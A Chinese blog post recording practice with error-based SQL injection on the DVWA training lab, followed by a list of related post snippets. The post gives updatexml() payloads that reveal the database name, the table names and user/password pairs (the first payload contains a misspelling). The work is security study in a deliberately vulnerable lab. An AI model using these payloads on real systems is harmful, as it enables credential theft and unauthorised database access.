DVWA[SQL-Injection]报错注入学习记录

最新推荐文章于 2024-06-25 15:00:07 发布
最新推荐文章于 2024-06-25 15:00:07 发布
阅读量538 收藏
点赞数
文章标签: sql 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/125629088
版权

还是以sql-injection为例

爆个库:

输入查询语句:

1‘ and updataxml(1,concat(0x7e,database()),1)-- -

得到数据库库名为dvwa

爆个表名:

-1' and updatexml(1,  concat( 0x7e,   ( select table_name from information_schema.tables where table_schema='dvwa'  limit 0,1),0x7e),1)-- -
-1' and updatexml(1,  concat( 0x7e,(select table_name from information_schema.tables where table_schema='dvwa'  limit 1,1),0x7e),1)-- -

 接下来还是爆users表里面的user和password字段。在使用updatexml()这个函数的时候有需要注意的地方,具体参考:传送门

输入查询语句:

-1' and updatexml(1,concat(0x7e,substr((select concat(user,'|',password) from dvwa.users limit 0,1),1,31),0x7e),1)-- -

因为updatexml只支持32位的报错,因此最好一行一行地使用 concat limit 与substr 逐个爆破,调一下参数就行

联合一下前面的,就可以得到user和password 

 

 

narukuuuu
关注
安装DVWA数据库时始终报错解决方法
weixin_45923850的博客
10-17 4213
当安装dvwa靶场时出现Could not connect to the database service. Please check the config file. Database Error #1045: Access denied for user 'root'@'localhost' (using password: YES).错误如何处理
DVWA系列---基于报错的SQL注入SQL Injection
野原新之助
02-06 1267
文章目录1、Low2、Medium3、High
dvwa进行报错注入
m0_65150886的博客
08-29 202
table_schema='dvwa' 查询库名为dwa,table_name='users'查询名为users,information_schema.columns 内置列,column_name列名,count(column_name)计算查询到的列数。1' and extractvalue(1,concat(0x7e,database()))# 可以看到有一个dvwa。可以通过修改url中的值来修改查询的,limit后面的+示空格,1示从哪个位置开始查询。首先将包发送给测试器。
DVWA盲注之报错注入的存在问题
weixin_43939527的博客
11-12 626
DVWA盲注之报错注入 实验等级为LOW级别 在报错注入中,发现高版本的dvwa并不会跳转出报错内容 我们输入1’ 只会告诉我们这个参数不正确 此时我们使用报错函数也没有用,只能做出exist or missing的判断 但是我们发现只需要修改对应的脚本内容,即可实现报错函数的利用,顺利爆出数据 修改后的脚本如下: <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check data
DVWA 报错
0yst3r ‘s blog
03-19 617
DVWA简介:DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。(其实就是小白用来练习各种网络安全问题所搭建的一个靶场,这就像一个网站一样,需要部署在服务器上面) xampp下载地址:https://s...
sql注入报错注入
2302_79119987的博客
04-19 1553
实行注入的地方。
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 390
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 859
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库信息(group_concat()) 8、获取字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 382
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA】--- 七、sql注入(SQL Injection)
qq_43168364的博客
05-31 429
SQL Injection 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 首先判断注入点 由回显可知注入点就在输入框中,也可以在URL中进行注入。接下来判断注入类型。另id=1’ 根据回显判断有可能是字符型注入点,使用and进行闭合看看是否是字符型注入点。 闭合后回显正常就是字符型注入点,这里尝试使用联合查询进行进行注入,首先判断它的字段数。 二、Medium级别 三、High级别 四、Impossible级别
dvwa连接数据库报错Could not connect to the database service. Please check the config file.
weixin_53270267的博客
03-28 2226
如果没有之前安装过mysql,那么可以试试把 $_DVWA['db_password']这行改成 $_DVWA['db_password']=' ' 或者 $_DVWA['db_password']='root'然后解决数据库里连接不上的问题,因为我之前已经下载过了mysql,所以我更改了我的mysql密码,不是默认的密码root了,所以在我修改了www目录下的配置文件,保存之后重启,成功了。先把下面这个变成绿色的,我用的是phpstudy,不是新版的小皮面板,所以下面这个修改的时候,
BurpSuite爆破DVWA,报错:Preset payload list is empty
weixin_51593721的博客
06-29 2565
把复合集数修改为2就行,因为爆破时选择的有效载荷数为2。
DVWA文件包含报错The PHP function allow_url_include is not enabled.的解决方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 8717
解决方法前言一、修改php配置文件二、重启mysql和apache服务 前言     打开File Inclusion,发现红色报错内容 The PHP function allow_url_include is not enabled.(PHP函数allow_url_include未启用)。 一、修改php配置文件     /etc/php/7.4/apache2/ 文件夹 cd /etc/php/7.4/apache2/
【无标题】DVWA sql注入 报错问题
weixin_50339521的博客
08-25 820
dvwasql注入报错问题
解决DVWA配置报错
gw_csdn的博客
12-30 4974
之前在ubantu下部署DVWA学习Web漏洞的时候碰到了访问DVWA页面404错误、mysql 1045(28000)错误两个问题,今天有时间写一下解决办法 1.PHP的配置问题(apache2.conf) 默认路径确实是/var/www 但是,在此目录下的php文件时无法打开的,提示404错误,无法找到路径下文件 需要把文件放在/var/www/htm...
DVWA设置mysql_解决DVWA配置报错
weixin_32858247的博客
01-20 1192
之前在ubantu下部署DVWA学习Web漏洞的时候碰到了访问DVWA页面404错误、mysql 1045(28000)错误两个问题,今天有时间写一下解决办法1.PHP的配置问题(apache2.conf)默认路径确实是/var/www 但是,在此目录下的php文件时无法打开的,提示404错误,无法找到路径下文件需要把文件放在/var/www/html下才能找到,但是路径是不需要加/html的2....
【网络安全的神秘世界】解决dvwa靶场报错:Illegal mix of collations for operation ‘UNION
最新发布
菜鸟小羊的博客
06-25 721
我的 information_schema 使用的是 utf8_general_ci。请根据您的实际情况调整字符集。这通常意味着在执行 UNION 操作时,不同字符集的数据发生了混合,导致冲突。修改字符集设置后,重启 MySQL 服务以应用更改,再次测试一下发现成功。查看 information_schema 的字符集。修改 DVWA 数据库字符集。
Dvwa sql low 联合注入,报错注入
m0_73581247的博客
06-03 328
rand 值)如果此时临时只有 key 为 1 的行不存在 key 为 0 的行,那么数据库要将该条记录插入临。时,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为 1,就。如果 key 存在于临时中,则更新临时中的数据(更新数据时,不再计算 rand 值);实际测试中发现,出现报错,至少要求数据记录为 3 行,记录数超过 3 行一定会报错,2 行。输入1,数据正常显示,输入1’,页面显示爆错,1附近多出现了一个逗号。Id=1 and 1=2 页面无显示。
Web安全 学习日记5 - SQL盲注 和 报错注入 (DVWA)
qq_46081990的博客
03-11 601
SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,需要使用一些特殊的方式来判断,这个过程成为盲注。
DVWA教程:SQL注入漏洞案例研究
在2020年12月6日的一篇文章中,作者lll-yz探讨了如何通过DVWA(Damn Vulnerable Web Application)平台进行SQL注入学习DVWA是一个用于教育和测试Web安全的开源工具,而本文着重于其中的SQL注入部分。SQL注入是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值